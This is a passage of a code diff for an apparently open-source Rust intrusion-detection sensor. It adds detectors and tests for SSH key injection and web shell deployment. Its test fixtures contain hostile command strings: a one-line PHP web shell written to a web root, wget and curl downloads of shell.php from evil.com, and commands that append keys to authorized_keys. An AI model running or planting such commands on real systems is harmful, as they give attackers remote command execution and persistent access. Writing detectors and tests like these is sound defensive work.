+///   - File write to `/etc/ssh/sshd_config` by non-root non-sshd process
+///   - Command containing `ssh-keygen` + `authorized_keys`
+///   - Command containing `echo` + `>>.*authorized_keys`
+///
+/// Allowlisted processes (legitimate key managers):
+///   sshd, ssh-keygen, cloud-init, waagent
+pub struct SshKeyInjectionDetector {
+    host: String,
+    cooldown: Duration,
+    /// Suppress re-alerts per (key) within cooldown window.
+    alerted: HashMap<String, DateTime<Utc>>,
+}
+
+/// Processes that legitimately modify SSH keys.
+const ALLOWED_PROCESSES: &[&str] = &["sshd", "ssh-keygen", "cloud-init", "waagent"];
+
+impl SshKeyInjectionDetector {
+    pub fn new(host: impl Into<String>, cooldown_seconds: u64) -> Self {
+        Self {
+            host: host.into(),
+            cooldown: Duration::seconds(cooldown_seconds as i64),
+            alerted: HashMap::new(),
+        }
+    }
+
+    pub fn process(&mut self, event: &Event) -> Option<Incident> {
+        match event.kind.as_str() {
+            "file.write_access" => self.check_file_write(event),
+            "shell.command_exec" => self.check_command(event),
+            _ => None,
+        }
+    }
+
+    fn check_file_write(&mut self, event: &Event) -> Option<Incident> {
+        let filename = event.details.get("filename").and_then(|v| v.as_str())?;
+        let comm = event
+            .details
+            .get("comm")
+            .and_then(|v| v.as_str())
+            .unwrap_or("unknown");
+
+        // Skip allowlisted processes
+        if ALLOWED_PROCESSES.contains(&comm) {
+            return None;
+        }
+
+        let pid = event
+            .details
+            .get("pid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+        let uid = event
+            .details
+            .get("uid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+
+        // Pattern 1: authorized_keys modification
+        if filename.contains(".ssh/authorized_keys") {
+            return self.emit_incident(
+                event.ts,
+                "authorized_keys_write",
+                Severity::Critical,
+                comm,
+                pid,
+                uid,
+                filename,
+                &format!(
+                    "Unauthorized write to {filename} by {comm} (pid={pid}, uid={uid}) \
+                     — possible SSH key injection for persistence"
+                ),
+            );
+        }
+
+        // Pattern 2: sshd_config modification by non-root non-sshd
+        if filename == "/etc/ssh/sshd_config" && uid != 0 {
+            return self.emit_incident(
+                event.ts,
+                "sshd_config_write",
+                Severity::High,
+                comm,
+                pid,
+                uid,
+                filename,
+                &format!(
+                    "Non-root process {comm} (pid={pid}, uid={uid}) modified {filename} \
+                     — possible SSH configuration tampering"
+                ),
+            );
+        }
+
+        None
+    }
+
+    fn check_command(&mut self, event: &Event) -> Option<Incident> {
+        let command = event.details.get("command").and_then(|v| v.as_str())?;
+        if command.is_empty() {
+            return None;
+        }
+
+        let lower = command.to_lowercase();
+        let comm = event
+            .details
+            .get("comm")
+            .and_then(|v| v.as_str())
+            .unwrap_or("unknown");
+
+        // Skip allowlisted processes
+        if ALLOWED_PROCESSES.contains(&comm) {
+            return None;
+        }
+
+        let pid = event
+            .details
+            .get("pid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+        let uid = event
+            .details
+            .get("uid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+
+        // Pattern 3: ssh-keygen + authorized_keys
+        if lower.contains("ssh-keygen") && lower.contains("authorized_keys") {
+            return self.emit_incident(
+                event.ts,
+                "ssh_keygen_authorized_keys",
+                Severity::Critical,
+                comm,
+                pid,
+                uid,
+                command,
+                &format!(
+                    "Command combines ssh-keygen with authorized_keys modification \
+                     (pid={pid}, uid={uid}): {command}"
+                ),
+            );
+        }
+
+        // Pattern 4: echo >> authorized_keys
+        if lower.contains("echo") && lower.contains("authorized_keys") && lower.contains(">>") {
+            return self.emit_incident(
+                event.ts,
+                "echo_append_authorized_keys",
+                Severity::Critical,
+                comm,
+                pid,
+                uid,
+                command,
+                &format!(
+                    "Command appends to authorized_keys via echo \
+                     (pid={pid}, uid={uid}): {command}"
+                ),
+            );
+        }
+
+        None
+    }
+
+    fn emit_incident(
+        &mut self,
+        ts: DateTime<Utc>,
+        pattern: &str,
+        severity: Severity,
+        comm: &str,
+        pid: u32,
+        uid: u32,
+        target: &str,
+        summary: &str,
+    ) -> Option<Incident> {
+        let key = format!("{pattern}:{comm}:{target}");
+
+        // Cooldown check
+        if let Some(&last) = self.alerted.get(&key) {
+            if ts - last < self.cooldown {
+                return None;
+            }
+        }
+        self.alerted.insert(key, ts);
+
+        // Prune stale entries
+        if self.alerted.len() > 1000 {
+            let cutoff = ts - self.cooldown;
+            self.alerted.retain(|_, t| *t > cutoff);
+        }
+
+        // Truncate target for display
+        let display_target = if target.len() > 200 {
+            format!("{}...", &target[..200])
+        } else {
+            target.to_string()
+        };
+
+        Some(Incident {
+            ts,
+            host: self.host.clone(),
+            incident_id: format!(
+                "ssh_key_injection:{pattern}:{pid}:{}",
+                ts.format("%Y-%m-%dT%H:%MZ")
+            ),
+            severity,
+            title: format!("SSH key injection ({pattern}): {display_target}"),
+            summary: summary.to_string(),
+            evidence: serde_json::json!([{
+                "kind": "ssh_key_injection",
+                "pattern": pattern,
+                "comm": comm,
+                "pid": pid,
+                "uid": uid,
+                "target": target,
+            }]),
+            recommended_checks: vec![
+                "Review authorized_keys for unknown public keys: cat ~/.ssh/authorized_keys"
+                    .to_string(),
+                format!("Investigate process {comm} (pid={pid}) and its parent"),
+                "Check for other persistence: crontab -l, systemctl list-unit-files".to_string(),
+                "Verify sshd_config has not been weakened: PermitRootLogin, PasswordAuthentication"
+                    .to_string(),
+                "Audit recent logins: last, lastlog".to_string(),
+            ],
+            tags: vec!["ssh_key_injection".to_string(), "persistence".to_string()],
+            entities: vec![EntityRef::path(target)],
+        })
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use innerwarden_core::event::Severity as Sev;
+
+    fn file_write_event(comm: &str, filename: &str, uid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "file.write_access".to_string(),
+            severity: Sev::Info,
+            summary: format!("{comm} writing {filename}"),
+            details: serde_json::json!({
+                "pid": 1234,
+                "uid": uid,
+                "ppid": 1,
+                "comm": comm,
+                "filename": filename,
+                "write": true,
+                "flags": 1,
+                "cgroup_id": 0,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    fn command_event(comm: &str, command: &str, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "shell.command_exec".to_string(),
+            severity: Sev::Info,
+            summary: format!("Command: {command}"),
+            details: serde_json::json!({
+                "pid": 5678,
+                "uid": 1000,
+                "ppid": 1,
+                "comm": comm,
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    #[test]
+    fn detects_authorized_keys_write() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "vim",
+                "/home/user/.ssh/authorized_keys",
+                1000,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("authorized_keys_write"));
+    }
+
+    #[test]
+    fn detects_root_authorized_keys_write() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "bash",
+                "/root/.ssh/authorized_keys",
+                0,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn detects_sshd_config_write_by_non_root() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event("vim", "/etc/ssh/sshd_config", 1000, now))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::High);
+        assert!(inc.title.contains("sshd_config_write"));
+    }
+
+    #[test]
+    fn allows_root_sshd_config_write() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        // root (uid=0) writing sshd_config is considered normal
+        assert!(det
+            .process(&file_write_event("vim", "/etc/ssh/sshd_config", 0, now))
+            .is_none());
+    }
+
+    #[test]
+    fn detects_ssh_keygen_authorized_keys_command() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        let inc = det
+            .process(&command_event(
+                "bash",
+                "ssh-keygen -t rsa -f /tmp/key && cat /tmp/key.pub >> ~/.ssh/authorized_keys",
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("ssh_keygen_authorized_keys"));
+    }
+
+    #[test]
+    fn detects_echo_append_authorized_keys() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        let inc = det
+            .process(&command_event(
+                "bash",
+                "echo 'ssh-rsa AAAA...' >> /home/user/.ssh/authorized_keys",
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("echo_append_authorized_keys"));
+    }
+
+    #[test]
+    fn allows_sshd_process() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "sshd",
+                "/home/user/.ssh/authorized_keys",
+                0,
+                now
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn allows_cloud_init() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "cloud-init",
+                "/home/ubuntu/.ssh/authorized_keys",
+                0,
+                now
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn cooldown_suppresses_duplicate() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "vim",
+                "/home/user/.ssh/authorized_keys",
+                1000,
+                now
+            ))
+            .is_some());
+        assert!(det
+            .process(&file_write_event(
+                "vim",
+                "/home/user/.ssh/authorized_keys",
+                1000,
+                now + Duration::seconds(10)
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn fires_again_after_cooldown() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "vim",
+                "/home/user/.ssh/authorized_keys",
+                1000,
+                now
+            ))
+            .is_some());
+        assert!(det
+            .process(&file_write_event(
+                "vim",
+                "/home/user/.ssh/authorized_keys",
+                1000,
+                now + Duration::seconds(601)
+            ))
+            .is_some());
+    }
+
+    #[test]
+    fn ignores_irrelevant_events() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        let event = Event {
+            ts: now,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "network.outbound_connect".to_string(),
+            severity: Sev::Info,
+            summary: "network event".to_string(),
+            details: serde_json::json!({}),
+            tags: vec![],
+            entities: vec![],
+        };
+        assert!(det.process(&event).is_none());
+    }
+
+    #[test]
+    fn ignores_normal_file_writes() {
+        let mut det = SshKeyInjectionDetector::new("test", 600);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event("vim", "/tmp/notes.txt", 1000, now))
+            .is_none());
+        assert!(det
+            .process(&file_write_event("vim", "/home/user/file.txt", 1000, now))
+            .is_none());
+    }
+}

--- a/crates/sensor/src/detectors/web_shell.rs
+++ b/crates/sensor/src/detectors/web_shell.rs
@@ -1,0 +1,556 @@
+use std::collections::HashMap;
+
+use chrono::{DateTime, Duration, Utc};
+use innerwarden_core::{entities::EntityRef, event::Event, event::Severity, incident::Incident};
+
+/// Detects web shells being created or written in web-accessible directories.
+///
+/// Web shells are a primary post-exploitation tool: an attacker uploads a
+/// script (PHP, JSP, ASP, CGI) to a web root, then uses it as a remote
+/// command-and-control channel via HTTP.
+///
+/// Detection patterns:
+///   - File created/written in web paths with suspicious extensions
+///   - Command execution that writes script files to web directories
+///     (echo > .php, wget .php, curl > .php)
+///
+/// Web directories:
+///   /var/www/, /usr/share/nginx/, /var/lib/nginx/,
+///   /srv/http/, /opt/lampp/htdocs/
+///
+/// Suspicious extensions: .php, .jsp, .jspx, .asp, .aspx, .cgi, .pl, .py
+///
+/// Allowlisted deployer processes:
+///   apt, dpkg, pip, composer, npm, git, rsync, cp
+pub struct WebShellDetector {
+    host: String,
+    cooldown: Duration,
+    /// Suppress re-alerts per (key) within cooldown window.
+    alerted: HashMap<String, DateTime<Utc>>,
+}
+
+/// Web-accessible directory prefixes.
+const WEB_PATHS: &[&str] = &[
+    "/var/www/",
+    "/usr/share/nginx/",
+    "/var/lib/nginx/",
+    "/srv/http/",
+    "/opt/lampp/htdocs/",
+];
+
+/// Extensions that are commonly used for web shells.
+const SUSPICIOUS_EXTENSIONS: &[&str] = &[
+    ".php", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".pl", ".py",
+];
+
+/// Processes that legitimately deploy files to web directories.
+const ALLOWED_DEPLOYERS: &[&str] = &[
+    "apt", "dpkg", "pip", "pip3", "composer", "npm", "git", "rsync", "cp",
+];
+
+impl WebShellDetector {
+    pub fn new(host: impl Into<String>, cooldown_seconds: u64) -> Self {
+        Self {
+            host: host.into(),
+            cooldown: Duration::seconds(cooldown_seconds as i64),
+            alerted: HashMap::new(),
+        }
+    }
+
+    /// Returns true if the path is inside a web-accessible directory.
+    fn is_web_path(path: &str) -> bool {
+        WEB_PATHS.iter().any(|prefix| path.starts_with(prefix))
+    }
+
+    /// Returns true if the file has a suspicious web shell extension.
+    fn has_suspicious_extension(path: &str) -> bool {
+        let lower = path.to_lowercase();
+        SUSPICIOUS_EXTENSIONS.iter().any(|ext| lower.ends_with(ext))
+    }
+
+    pub fn process(&mut self, event: &Event) -> Option<Incident> {
+        match event.kind.as_str() {
+            "file.write_access" => self.check_file_write(event),
+            "shell.command_exec" => self.check_command(event),
+            _ => None,
+        }
+    }
+
+    fn check_file_write(&mut self, event: &Event) -> Option<Incident> {
+        let filename = event.details.get("filename").and_then(|v| v.as_str())?;
+
+        // Must be in a web directory
+        if !Self::is_web_path(filename) {
+            return None;
+        }
+
+        // Must have a suspicious extension
+        if !Self::has_suspicious_extension(filename) {
+            return None;
+        }
+
+        let comm = event
+            .details
+            .get("comm")
+            .and_then(|v| v.as_str())
+            .unwrap_or("unknown");
+
+        // Skip known legitimate deployer processes
+        if ALLOWED_DEPLOYERS.contains(&comm) {
+            return None;
+        }
+
+        let pid = event
+            .details
+            .get("pid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+        let uid = event
+            .details
+            .get("uid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+
+        self.emit_incident(
+            event.ts,
+            "file_write",
+            comm,
+            pid,
+            uid,
+            filename,
+            &format!(
+                "Suspicious web shell file written by {comm} (pid={pid}, uid={uid}): \
+                 {filename} — script file created in web directory"
+            ),
+        )
+    }
+
+    fn check_command(&mut self, event: &Event) -> Option<Incident> {
+        let command = event.details.get("command").and_then(|v| v.as_str())?;
+        if command.is_empty() {
+            return None;
+        }
+
+        let lower = command.to_lowercase();
+        let comm = event
+            .details
+            .get("comm")
+            .and_then(|v| v.as_str())
+            .unwrap_or("unknown");
+
+        // Skip known deployers
+        if ALLOWED_DEPLOYERS.contains(&comm) {
+            return None;
+        }
+
+        let pid = event
+            .details
+            .get("pid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+        let uid = event
+            .details
+            .get("uid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+
+        // Check for writing script files to web dirs via command
+        let is_web_shell_command = Self::is_command_web_shell_write(&lower);
+
+        if is_web_shell_command {
+            let display_cmd = if command.len() > 200 {
+                format!("{}...", &command[..200])
+            } else {
+                command.to_string()
+            };
+
+            return self.emit_incident(
+                event.ts,
+                "command_write",
+                comm,
+                pid,
+                uid,
+                &display_cmd,
+                &format!(
+                    "Web shell deployment via command by {comm} (pid={pid}, uid={uid}): \
+                     {display_cmd}"
+                ),
+            );
+        }
+
+        None
+    }
+
+    /// Checks if a command writes a web shell file to a web directory.
+    fn is_command_web_shell_write(lower: &str) -> bool {
+        // Must target a web directory
+        let targets_web_dir = WEB_PATHS.iter().any(|p| lower.contains(p));
+        if !targets_web_dir {
+            return false;
+        }
+
+        // Must target a suspicious extension
+        let targets_shell_ext = SUSPICIOUS_EXTENSIONS.iter().any(|ext| lower.contains(ext));
+        if !targets_shell_ext {
+            return false;
+        }
+
+        // Match patterns: echo > .php, wget .php, curl > .php
+        lower.contains("echo") && lower.contains('>')
+            || lower.contains("wget")
+            || lower.contains("curl") && lower.contains('>')
+    }
+
+    fn emit_incident(
+        &mut self,
+        ts: DateTime<Utc>,
+        pattern: &str,
+        comm: &str,
+        pid: u32,
+        uid: u32,
+        target: &str,
+        summary: &str,
+    ) -> Option<Incident> {
+        let key = format!("{pattern}:{comm}:{target}");
+
+        // Cooldown check
+        if let Some(&last) = self.alerted.get(&key) {
+            if ts - last < self.cooldown {
+                return None;
+            }
+        }
+        self.alerted.insert(key, ts);
+
+        // Prune stale entries
+        if self.alerted.len() > 1000 {
+            let cutoff = ts - self.cooldown;
+            self.alerted.retain(|_, t| *t > cutoff);
+        }
+
+        Some(Incident {
+            ts,
+            host: self.host.clone(),
+            incident_id: format!(
+                "web_shell:{pattern}:{pid}:{}",
+                ts.format("%Y-%m-%dT%H:%MZ")
+            ),
+            severity: Severity::Critical,
+            title: format!("Web shell detected ({pattern}): {}", truncate(target, 120)),
+            summary: summary.to_string(),
+            evidence: serde_json::json!([{
+                "kind": "web_shell",
+                "pattern": pattern,
+                "comm": comm,
+                "pid": pid,
+                "uid": uid,
+                "target": target,
+            }]),
+            recommended_checks: vec![
+                format!("Remove the suspicious file immediately if confirmed: rm {target}"),
+                format!("Investigate process {comm} (pid={pid}) and how it got shell access"),
+                "Check web server access logs for exploitation attempts".to_string(),
+                "Search for additional web shells: find /var/www -name '*.php' -newer /var/log/syslog".to_string(),
+                "Review web application for upload vulnerabilities".to_string(),
+            ],
+            tags: vec![
+                "web_shell".to_string(),
+                "post_exploitation".to_string(),
+            ],
+            entities: vec![EntityRef::path(target)],
+        })
+    }
+}
+
+fn truncate(s: &str, max: usize) -> String {
+    if s.len() > max {
+        format!("{}...", &s[..max])
+    } else {
+        s.to_string()
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use innerwarden_core::event::Severity as Sev;
+
+    fn file_write_event(comm: &str, filename: &str, uid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "file.write_access".to_string(),
+            severity: Sev::Info,
+            summary: format!("{comm} writing {filename}"),
+            details: serde_json::json!({
+                "pid": 1234,
+                "uid": uid,
+                "ppid": 1,
+                "comm": comm,
+                "filename": filename,
+                "write": true,
+                "flags": 1,
+                "cgroup_id": 0,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    fn command_event(comm: &str, command: &str, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "shell.command_exec".to_string(),
+            severity: Sev::Info,
+            summary: format!("Command: {command}"),
+            details: serde_json::json!({
+                "pid": 5678,
+                "uid": 1000,
+                "ppid": 1,
+                "comm": comm,
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    #[test]
+    fn detects_php_in_var_www() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "www-data",
+                "/var/www/html/shell.php",
+                33,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("file_write"));
+    }
+
+    #[test]
+    fn detects_jsp_in_nginx() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "java",
+                "/usr/share/nginx/html/cmd.jsp",
+                1000,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn detects_aspx_in_srv_http() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "w3wp",
+                "/srv/http/backdoor.aspx",
+                1000,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn detects_echo_php_command() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&command_event(
+                "bash",
+                "echo '<?php system($_GET[\"cmd\"]); ?>' > /var/www/html/shell.php",
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("command_write"));
+    }
+
+    #[test]
+    fn detects_wget_php() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&command_event(
+                "bash",
+                "wget http://evil.com/shell.php -O /var/www/html/shell.php",
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn detects_curl_php() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&command_event(
+                "bash",
+                "curl http://evil.com/shell.php > /var/www/html/shell.php",
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn allows_apt_deployer() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event("apt", "/var/www/html/index.php", 0, now))
+            .is_none());
+    }
+
+    #[test]
+    fn allows_git_deployer() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event("git", "/var/www/html/app.php", 1000, now))
+            .is_none());
+    }
+
+    #[test]
+    fn ignores_non_web_path() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event("bash", "/tmp/shell.php", 1000, now))
+            .is_none());
+        assert!(det
+            .process(&file_write_event("bash", "/home/user/shell.php", 1000, now))
+            .is_none());
+    }
+
+    #[test]
+    fn ignores_non_suspicious_extension() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/html/index.html",
+                1000,
+                now
+            ))
+            .is_none());
+        assert!(det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/html/style.css",
+                1000,
+                now
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn cooldown_suppresses_duplicate() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/html/shell.php",
+                1000,
+                now
+            ))
+            .is_some());
+        assert!(det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/html/shell.php",
+                1000,
+                now + Duration::seconds(10)
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn fires_again_after_cooldown() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/html/shell.php",
+                1000,
+                now
+            ))
+            .is_some());
+        assert!(det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/html/shell.php",
+                1000,
+                now + Duration::seconds(301)
+            ))
+            .is_some());
+    }
+
+    #[test]
+    fn ignores_irrelevant_events() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let event = Event {
+            ts: now,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "network.outbound_connect".to_string(),
+            severity: Sev::Info,
+            summary: "network event".to_string(),
+            details: serde_json::json!({}),
+            tags: vec![],
+            entities: vec![],
+        };
+        assert!(det.process(&event).is_none());
+    }
+
+    #[test]
+    fn detects_cgi_extension() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "bash",
+                "/var/www/cgi-bin/backdoor.cgi",
+                1000,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn detects_py_in_lampp() {
+        let mut det = WebShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&file_write_event(
+                "python3",
+                "/opt/lampp/htdocs/shell.py",
+                1000,
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+}

--- a/crates/sensor/src/main.rs
+++ b/crates/sensor/src/main.rs
@@ -21,25 +21,31 @@ use collectors::{
 use detectors::c2_callback::C2CallbackDetector;
 use detectors::container_escape::ContainerEscapeDetector;
 use detectors::credential_stuffing::CredentialStuffingDetector;
+use detectors::crontab_persistence::CrontabPersistenceDetector;
+use detectors::data_exfiltration::DataExfiltrationDetector;
 use detectors::distributed_ssh::DistributedSshDetector;
 use detectors::dns_tunneling::DnsTunnelingDetector;
 use detectors::docker_anomaly::DockerAnomalyDetector;
 use detectors::execution_guard::{ExecutionGuardDetector, ExecutionMode};
 use detectors::fileless::FilelessDetector;
 use detectors::integrity_alert::IntegrityAlertDetector;
+use detectors::kernel_module_load::KernelModuleLoadDetector;
 use detectors::lateral_movement::LateralMovementDetector;
 use detectors::log_tampering::LogTamperingDetector;
 use detectors::osquery_anomaly::OsqueryAnomalyDetector;
 use detectors::port_scan::PortScanDetector;
 use detectors::privesc::PrivescDetector;
 use detectors::process_tree::ProcessTreeDetector;
+use detectors::reverse_shell::ReverseShellDetector;
 use detectors::search_abuse::SearchAbuseDetector;
 use detectors::ssh_bruteforce::SshBruteforceDetector;
+use detectors::ssh_key_injection::SshKeyInjectionDetector;
 use detectors::sudo_abuse::SudoAbuseDetector;
 use detectors::suricata_alert::SuricataAlertDetector;
 use detectors::suspicious_login::SuspiciousLoginDetector;
 use detectors::user_agent_scanner::UserAgentScannerDetector;
 use detectors::web_scan::WebScanDetector;
+use detectors::web_shell::WebShellDetector;
 use sinks::{jsonl::JsonlWriter, state::State};
 use tokio::sync::mpsc;
 use tokio::time;
@@ -79,6 +85,12 @@ struct DetectorSet {
     fileless: Option<FilelessDetector>,
     dns_tunneling: Option<DnsTunnelingDetector>,
     lateral_movement: Option<LateralMovementDetector>,
+    reverse_shell: Option<ReverseShellDetector>,
+    ssh_key_injection: Option<SshKeyInjectionDetector>,
+    web_shell: Option<WebShellDetector>,
+    kernel_module_load: Option<KernelModuleLoadDetector>,
+    crontab_persistence: Option<CrontabPersistenceDetector>,
+    data_exfiltration: Option<DataExfiltrationDetector>,
 }
 
 #[derive(Default)]
@@ -327,6 +339,59 @@ async fn main() -> Result<()> {
                 d.ssh_threshold,
                 d.scan_threshold,
                 d.window_seconds,
+            )
+        }),
+        reverse_shell: cfg.detectors.reverse_shell.enabled.then(|| {
+            let d = &cfg.detectors.reverse_shell;
+            info!(
+                cooldown_seconds = d.cooldown_seconds,
+                "reverse_shell detector enabled"
+            );
+            ReverseShellDetector::new(&cfg.agent.host_id, d.cooldown_seconds)
+        }),
+        ssh_key_injection: cfg.detectors.ssh_key_injection.enabled.then(|| {
+            let d = &cfg.detectors.ssh_key_injection;
+            info!(
+                cooldown_seconds = d.cooldown_seconds,
+                "ssh_key_injection detector enabled"
+            );
+            SshKeyInjectionDetector::new(&cfg.agent.host_id, d.cooldown_seconds)
+        }),
+        web_shell: cfg.detectors.web_shell.enabled.then(|| {
+            let d = &cfg.detectors.web_shell;
+            info!(
+                cooldown_seconds = d.cooldown_seconds,
+                "web_shell detector enabled"
+            );
+            WebShellDetector::new(&cfg.agent.host_id, d.cooldown_seconds)
+        }),
+        kernel_module_load: cfg.detectors.kernel_module_load.enabled.then(|| {
+            let d = &cfg.detectors.kernel_module_load;
+            info!(
+                cooldown_seconds = d.cooldown_seconds,
+                "kernel_module_load detector enabled"
+            );
+            KernelModuleLoadDetector::new(&cfg.agent.host_id, d.cooldown_seconds)
+        }),
+        crontab_persistence: cfg.detectors.crontab_persistence.enabled.then(|| {
+            let d = &cfg.detectors.crontab_persistence;
+            info!(
+                cooldown_seconds = d.cooldown_seconds,
+                "crontab_persistence detector enabled"
+            );
+            CrontabPersistenceDetector::new(&cfg.agent.host_id, d.cooldown_seconds)
+        }),
+        data_exfiltration: cfg.detectors.data_exfiltration.enabled.then(|| {
+            let d = &cfg.detectors.data_exfiltration;
+            info!(
+                correlation_window_secs = d.correlation_window_secs,
+                cooldown_seconds = d.cooldown_seconds,
+                "data_exfiltration detector enabled"
+            );
+            DataExfiltrationDetector::new(
+                &cfg.agent.host_id,
+                d.correlation_window_secs,
+                d.cooldown_seconds,
             )
         }),
     };
@@ -922,6 +987,42 @@ fn process_event(
     }
 
     if let Some(ref mut det) = detectors.lateral_movement {
+        if let Some(incident) = det.process(&ev) {
+            write_incident(writer, stats, incident);
+        }
+    }
+
+    if let Some(ref mut det) = detectors.reverse_shell {
+        if let Some(incident) = det.process(&ev) {
+            write_incident(writer, stats, incident);
+        }
+    }
+
+    if let Some(ref mut det) = detectors.ssh_key_injection {
+        if let Some(incident) = det.process(&ev) {
+            write_incident(writer, stats, incident);
+        }
+    }
+
+    if let Some(ref mut det) = detectors.web_shell {
+        if let Some(incident) = det.process(&ev) {
+            write_incident(writer, stats, incident);
+        }
+    }
+
+    if let Some(ref mut det) = detectors.kernel_module_load {
+        if let Some(incident) = det.process(&ev) {
+            write_incident(writer, stats, incident);
+        }
+    }
+
+    if let Some(ref mut det) = detectors.crontab_persistence {
+        if let Some(incident) = det.process(&ev) {
